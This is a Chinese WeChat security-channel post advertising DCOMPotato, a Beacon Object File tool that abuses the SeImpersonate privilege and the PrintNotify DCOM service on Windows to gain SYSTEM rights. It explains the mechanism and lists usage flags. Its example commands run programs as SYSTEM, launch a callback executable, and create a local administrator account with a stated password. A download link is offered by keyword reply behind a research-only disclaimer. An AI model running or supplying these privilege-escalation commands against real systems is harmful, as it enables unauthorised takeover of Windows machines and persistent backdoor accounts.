声明:本公众号分享的安全工具和项目均来自互联网,仅提供安全研究和学习使用。若用于其他目的,使用者需要承包所有法律责任及相关连带责任,与本公众号和工具作者无关。特在此声明。
项目介绍
DCOMPotato的 BOF 版本。SeImpersonate
通过将恶意IUnknwon
对象传递给 PrintNotify 的 DCOM 调用来获得具有特权的 SYSTEM 特权。
默认情况下,以 SYSTEM 身份运行的 PrintNotify 服务的ImpersonationLevel设置为RPC_C_IMP_LEVEL_IMPERSONATE
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSvchostprint
使用方法
--pprog : program to launch. Default cmd.exe
--pargs : command line argument to pass to program. Default NULL
--pmode : create process call. 1 for CreateProcessWithTokenW. 2 for CreateProcessAsUser. 3 for NetUserAdd. Default 1
执行命令CreateProcessWithTokenW
DCOMPotato --pargs /c whoami /all > C:tempwhoami.txt
执行命令CreateProcessAsUser
DCOMPotato --pargs /c net user hagrid P@ssw0rd /add --pmode 2
执行程序 CreateProcessWithTokenW
DCOMPotato --pprog C:tempcallback.exe
使用 NetUserAdd 创建本地管理员帐号 (hagridP@ss@29hagr!d)
DCOMPotato --pmode 3
下载地址
点击下方名称进入公众号
回复关键字【230605】获取下载链接
技术交流加下方vx
原文始发于微信公众号(红蓝公鸡队):DCOMPotato bof实现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论